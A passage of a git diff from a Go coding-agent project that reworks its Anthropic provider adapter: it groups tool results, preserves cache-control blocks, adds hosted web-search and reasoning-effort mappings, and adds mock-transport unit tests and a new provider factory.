-					messages = append(messages, am)
-				} else {
-					am.Content = []anthropicContentBlock{{Type: "tool_result", ToolUseID: msg.ToolCallID, Content: msg.Content, IsError: msg.IsError}}
-					messages = append(messages, am)
-				}
-				// Send images as a separate user message
-				if len(imageBlocks) > 0 {
-					imageMsg := anthropicMessage{Role: "user", Content: imageBlocks}
-					messages = append(messages, imageMsg)
-				}
-				continue
-			}
-			am.Content = []anthropicContentBlock{{Type: "tool_result", ToolUseID: msg.ToolCallID, Content: msg.Content, IsError: msg.IsError}}
+			// Anthropic requires all tool_result blocks for the preceding assistant
+			// tool_use blocks to be in the next user message, before any other
+			// content. Group consecutive tool results to preserve that shape.
+			blocks, next := p.convertToolResultRun(params.Messages, i, cacheEnabled)
+			messages = append(messages, anthropicMessage{Role: "user", Content: blocks})
+			i = next - 1
+			continue
 		} else if len(msg.Contents) > 0 {
 			var blocks []anthropicContentBlock
 			for _, c := range msg.Contents {
@@ -512,7 +576,7 @@ func (p *Provider) convertMessages(params provider.ChatParams) []anthropicMessag
 				}
 				blocks = append(blocks, block)
 			}
-			if len(blocks) == 1 && blocks[0].Type == "text" {
+			if len(blocks) == 1 && blocks[0].Type == "text" && blocks[0].CacheControl == nil {
 				am.Content = blocks[0].Text
 			} else {
 				am.Content = blocks
@@ -525,14 +589,127 @@ func (p *Provider) convertMessages(params provider.ChatParams) []anthropicMessag
 	return messages
 }
 
+func (p *Provider) convertToolResultRun(messages []provider.Message, start int, cacheEnabled bool) ([]anthropicContentBlock, int) {
+	var resultBlocks []anthropicContentBlock
+	var imageBlocks []anthropicContentBlock
+	i := start
+	for i < len(messages) && messages[i].Role == "toolResult" {
+		resultBlock, images := p.convertToolResultMessage(messages[i], cacheEnabled)
+		resultBlocks = append(resultBlocks, resultBlock)
+		imageBlocks = append(imageBlocks, images...)
+		i++
+	}
+	return append(resultBlocks, imageBlocks...), i
+}
+
+func (p *Provider) convertToolResultMessage(msg provider.Message, cacheEnabled bool) (anthropicContentBlock, []anthropicContentBlock) {
+	textContent := msg.Content
+	var imageBlocks []anthropicContentBlock
+	var hasCacheControl bool
+
+	if len(msg.Contents) > 0 {
+		var textParts []string
+		for _, c := range msg.Contents {
+			switch c.Type {
+			case "text":
+				if c.Text != "" {
+					textParts = append(textParts, c.Text)
+				}
+				if c.CacheControl != nil {
+					hasCacheControl = true
+				}
+			case "image":
+				if c.Image != nil {
+					imageBlocks = append(imageBlocks, anthropicContentBlock{Type: "image", Source: &anthropicImage{Type: "base64", MediaType: c.Image.MimeType, Data: c.Image.Data}})
+				}
+			}
+		}
+		if len(textParts) > 0 {
+			textContent = strings.Join(textParts, "\n")
+		}
+	}
+
+	if strings.TrimSpace(textContent) == "" {
+		textContent = "Tool completed with no output."
+	}
+
+	resultBlock := anthropicContentBlock{Type: "tool_result", ToolUseID: msg.ToolCallID, Content: textContent, IsError: msg.IsError}
+	if hasCacheControl && cacheEnabled {
+		resultBlock.CacheControl = &anthropicCacheControl{Type: "ephemeral"}
+	}
+	return resultBlock, imageBlocks
+}
+
 func (p *Provider) convertTools(tools []provider.ToolDefinition) []anthropicTool {
 	var result []anthropicTool
 	for _, t := range tools {
+		if t.Kind == "hosted" {
+			toolType := provider.HostedWebSearchToolType(t.ProviderType, t.Name)
+			if toolType == "" {
+				continue
+			}
+			result = append(result, anthropicTool{Type: toolType})
+			continue
+		}
 		result = append(result, anthropicTool{Name: t.Name, Description: t.Description, InputSchema: t.Parameters})
 	}
 	return result
 }
 
+func deepseekReasoningEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingXHigh:
+		return "max"
+	default:
+		return "high"
+	}
+}
+
+func (p *Provider) thinkingFormatForModel(model *provider.Model) string {
+	if p.thinkingFormat != "" {
+		return p.thinkingFormat
+	}
+	if model != nil && model.Compat != nil && model.Compat.ThinkingFormat != "" {
+		return model.Compat.ThinkingFormat
+	}
+	lowerBaseURL := strings.ToLower(p.baseURL)
+	if strings.Contains(lowerBaseURL, "deepseek") {
+		return "deepseek"
+	}
+	if strings.Contains(lowerBaseURL, "xiaomimimo") {
+		return "xiaomi"
+	}
+	return ""
+}
+
+func isAnthropicAdaptiveModel(modelID string) bool {
+	return strings.HasPrefix(modelID, "claude-opus-4-7") ||
+		strings.HasPrefix(modelID, "claude-opus-4-6") ||
+		strings.HasPrefix(modelID, "claude-sonnet-4-6")
+}
+
+func useAdaptiveThinking(model *provider.Model, modelID string) bool {
+	if model != nil && model.Compat != nil && model.Compat.ForceAdaptiveThinking {
+		return true
+	}
+	return isAnthropicAdaptiveModel(modelID)
+}
+
+func anthropicAdaptiveEffort(level provider.ThinkingLevel) string {
+	switch level {
+	case provider.ThinkingMinimal, provider.ThinkingLow:
+		return "low"
+	case provider.ThinkingMedium:
+		return "medium"
+	case provider.ThinkingHigh:
+		return "high"
+	case provider.ThinkingXHigh:
+		return "xhigh"
+	default:
+		return "high"
+	}
+}
+
 func thinkingBudget(level provider.ThinkingLevel) int {
 	switch level {
 	case provider.ThinkingMinimal:
diff --git a/internal/provider/anthropic/provider_test.go b/internal/provider/anthropic/provider_test.go
index a66c06a..c87fd6e 100644
--- a/internal/provider/anthropic/provider_test.go
+++ b/internal/provider/anthropic/provider_test.go
@@ -1,9 +1,12 @@
 package anthropic
 
 import (
+	"bytes"
 	"context"
+	"encoding/json"
+	"io"
 	"net/http"
-	"net/http/httptest"
+	"net/url"
 	"testing"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
@@ -11,24 +14,8 @@ import (
 
 // ─── helpers ─────────────────────────────────────────────────────────────────
 
-func newTestServer(t *testing.T, sse string) *httptest.Server {
+func chatAndCollect(t *testing.T, p *Provider, params provider.ChatParams) []provider.StreamEvent {
 	t.Helper()
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte(sse))
-	}))
-	t.Cleanup(srv.Close)
-	return srv
-}
-
-func chatAndCollect(t *testing.T, srv *httptest.Server) []provider.StreamEvent {
-	t.Helper()
-	p := NewProvider("fake-key", srv.URL)
-	params := provider.ChatParams{
-		Messages: []provider.Message{provider.NewUserMessage("hi")},
-		Abort:    make(chan struct{}),
-	}
 	var events []provider.StreamEvent
 	for e := range p.Chat(context.Background(), params) {
 		events = append(events, e)
@@ -36,6 +23,54 @@ func chatAndCollect(t *testing.T, srv *httptest.Server) []provider.StreamEvent {
 	return events
 }
 
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockAnthropicProvider(t *testing.T, models []*provider.Model, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p := NewProviderWithModels("fake-key", "https://api.anthropic.com", models)
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
+			}
+			bodyCh <- string(body)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
+}
+
+func TestAnthropicProviderHTTPProxy(t *testing.T) {
+	p, err := NewProviderWithModelsAndProxy("fake-key", "https://api.anthropic.com", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
+	}
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.anthropic.com"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
 func mustUsage(t *testing.T, events []provider.StreamEvent) *provider.Usage {
 	t.Helper()
 	for _, e := range events {
@@ -47,8 +82,353 @@ func mustUsage(t *testing.T, events []provider.StreamEvent) *provider.Usage {
 	return nil
 }
 
+func boolPtr(v bool) *bool {
+	return &v
+}
+
 // ─── standard Anthropic SSE scenarios ────────────────────────────────────────
 
+func TestConvertMessagesPreservesCacheControlOnSingleTextBlock(t *testing.T) {
+	p := NewProvider("fake-key", "https://api.anthropic.com")
+	p.SetCacheControlEnabled(boolPtr(true))
+	msgs := p.convertMessages(provider.ChatParams{
+		Messages: []provider.Message{
+			{
+				Role: "user",
+				Contents: []provider.ContentBlock{
+					{
+						Type:         "text",
+						Text:         "cached text",
+						CacheControl: &provider.CacheControl{Type: "ephemeral"},
+					},
+				},
+			},
+		},
+	})
+
+	if len(msgs) != 1 {
+		t.Fatalf("len(messages) = %d, want 1", len(msgs))
+	}
+	blocks, ok := msgs[0].Content.([]anthropicContentBlock)
+	if !ok {
+		t.Fatalf("content type = %T, want []anthropicContentBlock", msgs[0].Content)
+	}
+	if len(blocks) != 1 {
+		t.Fatalf("len(blocks) = %d, want 1", len(blocks))
+	}
+	if blocks[0].CacheControl == nil || blocks[0].CacheControl.Type != "ephemeral" {
+		t.Fatalf("cache_control = %#v, want ephemeral", blocks[0].CacheControl)
+	}
+}
+
+func TestConvertMessagesOmitsCacheControlWhenDisabled(t *testing.T) {
+	p := NewProvider("fake-key", "https://api.anthropic.com")
+	p.SetCacheControlEnabled(boolPtr(false))
+	msgs := p.convertMessages(provider.ChatParams{
+		Messages: []provider.Message{
+			{
+				Role: "user",
+				Contents: []provider.ContentBlock{
+					{
+						Type:         "text",
+						Text:         "cached text",
+						CacheControl: &provider.CacheControl{Type: "ephemeral"},
+					},
+				},
+			},
+		},
+	})
+
+	if got, ok := msgs[0].Content.(string); !ok || got != "cached text" {
+		t.Fatalf("content = %#v (%T), want simple text", msgs[0].Content, msgs[0].Content)
+	}
+}
+
+func TestChatRequestPreservesCacheControlOnSingleTextBlock(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "claude-test"}}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	p.SetCacheControlEnabled(boolPtr(true))
+	params := provider.ChatParams{
+		ModelID: "claude-test",
+		Messages: []provider.Message{
+			{
+				Role: "user",
+				Contents: []provider.ContentBlock{
+					{
+						Type:         "text",
+						Text:         "cached text",
+						CacheControl: &provider.CacheControl{Type: "ephemeral"},
+					},
+				},
+			},
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if len(req.Messages) != 1 {
+		t.Fatalf("len(messages) = %d, want 1", len(req.Messages))
+	}
+	rawContent, err := json.Marshal(req.Messages[0].Content)
+	if err != nil {
+		t.Fatalf("marshal content: %v", err)
+	}
+	var blocks []anthropicContentBlock
+	if err := json.Unmarshal(rawContent, &blocks); err != nil {
+		t.Fatalf("content is not a block array: %v\ncontent: %s", err, rawContent)
+	}
+	if len(blocks) != 1 {
+		t.Fatalf("len(blocks) = %d, want 1", len(blocks))
+	}
+	if blocks[0].CacheControl == nil || blocks[0].CacheControl.Type != "ephemeral" {
+		t.Fatalf("cache_control = %#v, want ephemeral", blocks[0].CacheControl)
+	}
+}
+
+func TestChatRequestHostedWebSearchTool(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "claude-test"}}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID: "claude-test",
+		Messages: []provider.Message{
+			provider.NewUserMessage("search the web"),
+		},
+		Tools: []provider.ToolDefinition{
+			{Name: "web_search", Kind: "hosted", Provider: "anthropic", ProviderType: "messages"},
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if len(req.Tools) != 1 {
+		t.Fatalf("len(tools) = %d, want 1", len(req.Tools))
+	}
+	if req.Tools[0].Type != "web_search_20250305" {
+		t.Fatalf("tool.type = %q, want web_search_20250305", req.Tools[0].Type)
+	}
+	if req.Tools[0].Name != "" {
+		t.Fatalf("hosted tool should not include name: %#v", req.Tools[0])
+	}
+}
+
+func TestConvertMessagesAnthropicToolResultEmptyContentFallback(t *testing.T) {
+	p := NewProvider("fake-key", "https://api.anthropic.com")
+	msgs := p.convertMessages(provider.ChatParams{
+		Messages: []provider.Message{
+			provider.NewToolResultMessage("toolu_1", "bash", "", false),
+		},
+	})
+
+	if len(msgs) != 1 {
+		t.Fatalf("len(messages) = %d, want 1", len(msgs))
+	}
+	if msgs[0].Role != "user" {
+		t.Fatalf("role = %q, want user", msgs[0].Role)
+	}
+	blocks, ok := msgs[0].Content.([]anthropicContentBlock)
+	if !ok {
+		t.Fatalf("content type = %T, want []anthropicContentBlock", msgs[0].Content)
+	}
+	if len(blocks) != 1 {
+		t.Fatalf("len(blocks) = %d, want 1", len(blocks))
+	}
+	if blocks[0].Type != "tool_result" {
+		t.Fatalf("block type = %q, want tool_result", blocks[0].Type)
+	}
+	if blocks[0].ToolUseID != "toolu_1" {
+		t.Fatalf("tool_use_id = %q, want toolu_1", blocks[0].ToolUseID)
+	}
+	if blocks[0].Content != "Tool completed with no output." {
+		t.Fatalf("content = %#v, want fallback text", blocks[0].Content)
+	}
+}
+
+func TestConvertMessagesAnthropicGroupsConsecutiveToolResults(t *testing.T) {
+	p := NewProvider("fake-key", "https://api.anthropic.com")
+	msgs := p.convertMessages(provider.ChatParams{
+		Messages: []provider.Message{
+			provider.NewToolResultMessage("toolu_1", "read", "first", false),
+			provider.NewToolResultMessageWithContents("toolu_2", "screenshot", "image result", []provider.ContentBlock{
+				{Type: "text", Text: "second"},
+				{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "abc123"}},
+			}, false),
+			provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "done"}}),
+		},
+	})
+
+	if len(msgs) != 2 {
+		t.Fatalf("len(messages) = %d, want 2", len(msgs))
+	}
+	if msgs[0].Role != "user" {
+		t.Fatalf("role = %q, want user", msgs[0].Role)
+	}
+	blocks, ok := msgs[0].Content.([]anthropicContentBlock)
+	if !ok {
+		t.Fatalf("content type = %T, want []anthropicContentBlock", msgs[0].Content)
+	}
+	if len(blocks) != 3 {
+		t.Fatalf("len(blocks) = %d, want 3", len(blocks))
+	}
+	if blocks[0].Type != "tool_result" || blocks[0].ToolUseID != "toolu_1" || blocks[0].Content != "first" {
+		t.Fatalf("first block = %#v, want first tool_result", blocks[0])
+	}
+	if blocks[1].Type != "tool_result" || blocks[1].ToolUseID != "toolu_2" || blocks[1].Content != "second" {
+		t.Fatalf("second block = %#v, want second tool_result", blocks[1])
+	}
+	if blocks[2].Type != "image" || blocks[2].Source == nil || blocks[2].Source.Data != "abc123" {
+		t.Fatalf("third block = %#v, want image block after tool results", blocks[2])
+	}
+}
+
+func TestAnthropicThinkingFormatDeepSeek(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{
+		{ID: "deepseek-test", Reasoning: true},
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	p.SetThinkingFormat("deepseek")
+	params := provider.ChatParams{
+		ModelID:       "deepseek-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingXHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.Thinking == nil || req.Thinking.Type != "enabled" || req.Thinking.BudgetTokens != nil {
+		t.Fatalf("thinking = %#v, want enabled without budget_tokens", req.Thinking)
+	}
+	if req.OutputConfig == nil || req.OutputConfig.Effort != "max" {
+		t.Fatalf("output_config = %#v, want effort max", req.OutputConfig)
+	}
+}
+
+func TestAnthropicThinkingOmittedForNonReasoningModel(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{
+		{ID: "claude-opus-test", Reasoning: false},
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID:       "claude-opus-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingMedium,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.Thinking != nil {
+		t.Fatalf("thinking = %#v, want nil for non-reasoning model", req.Thinking)
+	}
+	if req.OutputConfig != nil {
+		t.Fatalf("output_config = %#v, want nil for non-reasoning model", req.OutputConfig)
+	}
+}
+
+func TestAnthropicThinkingAdaptiveForOpus47(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{
+		{ID: "claude-opus-4-7", Reasoning: true},
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID:       "claude-opus-4-7",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.Thinking == nil || req.Thinking.Type != "adaptive" || req.Thinking.BudgetTokens != nil {
+		t.Fatalf("thinking = %#v, want adaptive without budget_tokens", req.Thinking)
+	}
+	if req.OutputConfig == nil || req.OutputConfig.Effort != "high" {
+		t.Fatalf("output_config = %#v, want effort high", req.OutputConfig)
+	}
+}
+
+func TestAnthropicThinkingAdaptiveFromModelCompat(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockAnthropicProvider(t, []*provider.Model{
+		{ID: "custom-adaptive", Reasoning: true, Compat: &provider.ModelCompat{ForceAdaptiveThinking: true}},
+	}, "data: {\"type\":\"message_stop\"}\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID:       "custom-adaptive",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingMedium,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req anthropicRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if req.Thinking == nil || req.Thinking.Type != "adaptive" {
+		t.Fatalf("thinking = %#v, want adaptive", req.Thinking)
+	}
+	if req.OutputConfig == nil || req.OutputConfig.Effort != "medium" {
+		t.Fatalf("output_config = %#v, want effort medium", req.OutputConfig)
+	}
+}
+
 // TestAnthropicCache_FirstTurn: cache is created for the first time.
 // message_start carries cache_creation_input_tokens; no cache_read yet.
 func TestAnthropicCache_FirstTurn(t *testing.T) {
@@ -59,8 +439,8 @@ func TestAnthropicCache_FirstTurn(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":10}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -92,8 +472,8 @@ func TestAnthropicCache_CachedTurn(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":15}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -124,8 +504,8 @@ func TestAnthropicCache_NoCache(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":5}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 200 {
 		t.Errorf("Input = %d, want 200", u.Input)
@@ -155,8 +535,8 @@ func TestAnthropicCache_ProxyAllUsageInMessageDelta(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"input_tokens\":800,\"output_tokens\":20,\"cache_read_input_tokens\":600,\"cache_creation_input_tokens\":0}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 800 {
 		t.Errorf("Input = %d, want 800", u.Input)
@@ -183,8 +563,8 @@ func TestAnthropicCache_ProxySplitUsage(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"output_tokens\":8}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 500 {
 		t.Errorf("Input = %d, want 500", u.Input)
@@ -213,8 +593,8 @@ func TestAnthropicCache_FirstWinsOnConflict(t *testing.T) {
 		"data: {\"type\":\"message_delta\",\"delta\":{\"stop_reason\":\"end_turn\"},\"usage\":{\"input_tokens\":999,\"output_tokens\":12,\"cache_read_input_tokens\":800}}\n" +
 		"data: {\"type\":\"message_stop\"}\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockAnthropicProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	// message_start values win
 	if u.Input != 1000 {
diff --git a/internal/provider/factory/factory.go b/internal/provider/factory/factory.go
new file mode 100644
index 0000000..f004a69
--- /dev/null
+++ b/internal/provider/factory/factory.go
@@ -0,0 +1,205 @@
+package factory
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/provider/anthropic"
+	"github.com/startvibecoding/vibecoding/internal/provider/google"
+	"github.com/startvibecoding/vibecoding/internal/provider/openai"
+)
+
+// Create creates a provider and model from settings without changing the config schema.
+func Create(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
+	return CreateWithOptions(settings, providerName, modelID, Options{})
+}
+
+// Options controls compatibility behavior outside the settings schema.
+type Options struct {
+	BuiltinAnthropicCacheControl *bool
+}
+
+// CreateWithOptions creates a provider and model from settings with runtime-only options.
+func CreateWithOptions(settings *config.Settings, providerName, modelID string, opts Options) (provider.Provider, *provider.Model, error) {
+	if providerName == "" {
+		providerName = settings.DefaultProvider
+	}
+	if modelID == "" {
+		modelID = settings.DefaultModel
+	}
+
+	pc := settings.GetProviderConfig(providerName)
+	if pc != nil {
+		apiKey := settings.ResolveKey(providerName)
+		models := ConvertModelConfigs(providerName, pc.Models)
+		resolved := provider.ResolveAdapterConfig(pc)
+
+		var p provider.Provider
+		switch resolved.API {
+		case "anthropic-messages":
+			ap, err := anthropic.NewProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			if resolved.ThinkingFormat != "" {
+				ap.SetThinkingFormat(resolved.ThinkingFormat)
+			}
+			if resolved.CacheControl != nil {
+				ap.SetCacheControlEnabled(resolved.CacheControl)
+			}
+			ConfigureRetry(ap, settings)
+			p = ap
+		case "openai-chat", "openai", "openai-responses", "responses":
+			op, err := openai.NewProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			if resolved.ThinkingFormat != "" {
+				op.SetThinkingFormat(resolved.ThinkingFormat)
+			}
+			if resolved.API == "openai-responses" || resolved.API == "responses" {
+				op.SetUseResponsesAPI(true)
+				op.SetResponsesConfig(pc.Responses)
+			}
+			ConfigureRetry(op, settings)
+			p = op
+		case "google-gemini":
+			gp, err := google.NewGeminiProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			ConfigureRetry(gp, settings)
+			p = gp
+		case "google-vertex":
+			gp, err := google.NewVertexProviderWithModelsAndProxy(apiKey, resolved.BaseURL, pc.HTTPProxy, models)
+			if err != nil {
+				return nil, nil, err
+			}
+			ConfigureRetry(gp, settings)
+			p = gp
+		default:
+			return nil, nil, fmt.Errorf("unsupported API type: %s (use 'openai-chat', 'openai-responses', 'anthropic-messages', 'google-gemini', or 'google-vertex')", resolved.API)
+		}
+
+		model := p.GetModel(modelID)
+		if model == nil {
+			if len(models) > 0 {
+				model = models[0]
+			} else {
+				return nil, nil, fmt.Errorf("no models configured for provider %s", providerName)
+			}
+		}
+		return p, model, nil
+	}
+
+	var p provider.Provider
+	switch strings.ToLower(providerName) {
+	case "openai":
+		p = openai.NewProvider(settings.ResolveKey(providerName), "")
+	case "anthropic":
+		ap := anthropic.NewProvider(settings.ResolveKey(providerName), "")
+		if opts.BuiltinAnthropicCacheControl != nil {
+			ap.SetCacheControlEnabled(opts.BuiltinAnthropicCacheControl)
+		}
+		p = ap
+	case "google-gemini":
+		p = google.NewGeminiProvider(settings.ResolveKey(providerName), "")
+	case "google-vertex":
+		p = google.NewVertexProvider(settings.ResolveKey(providerName), "")
+	default:
+		return nil, nil, fmt.Errorf("unknown provider: %s (add it to settings.json providers section)", providerName)
+	}
+	ConfigureRetry(p, settings)
+
+	model := p.GetModel(modelID)
+	if model == nil {
+		models := p.Models()
+		if len(models) > 0 {
+			model = models[0]
+		} else {
+			return nil, nil, fmt.Errorf("no models available for provider %s", providerName)
+		}
+	}
+	return p, model, nil
+}
+
+type retryConfigurable interface {
+	SetRetryConfig(cfg *provider.RetryConfig)
+}
+
+// ConfigureRetry sets retry config on a provider if it supports it.
+func ConfigureRetry(p provider.Provider, settings *config.Settings) {
+	if rc, ok := p.(retryConfigurable); ok {
+		rc.SetRetryConfig(&provider.RetryConfig{
+			Enabled:     settings.Retry.Enabled,
+			MaxRetries:  settings.Retry.MaxRetries,
+			BaseDelayMs: settings.Retry.BaseDelayMs,
+		})
+	}
+}
+
+// ConvertModelConfigs converts config.ModelConfig to provider.Model.
+func ConvertModelConfigs(providerName string, models []config.ModelConfig) []*provider.Model {
+	result := make([]*provider.Model, 0, len(models))
+	for _, m := range models {
+		input := m.Input
+		if len(input) == 0 {
+			input = []string{"text"}
+		}
+		var cost provider.ModelPricing
+		if m.Cost != nil {
+			cost = provider.ModelPricing{
+				Input:      m.Cost.Input,
+				Output:     m.Cost.Output,
+				CacheRead:  m.Cost.CacheRead,
+				CacheWrite: m.Cost.CacheWrite,
+			}
+		}
+		result = append(result, &provider.Model{
+			ID:            m.ID,
+			Name:          m.Name,
+			Provider:      providerName,
+			Reasoning:     m.Reasoning,
+			Input:         input,
+			Cost:          cost,
+			ContextWindow: m.ContextWindow,
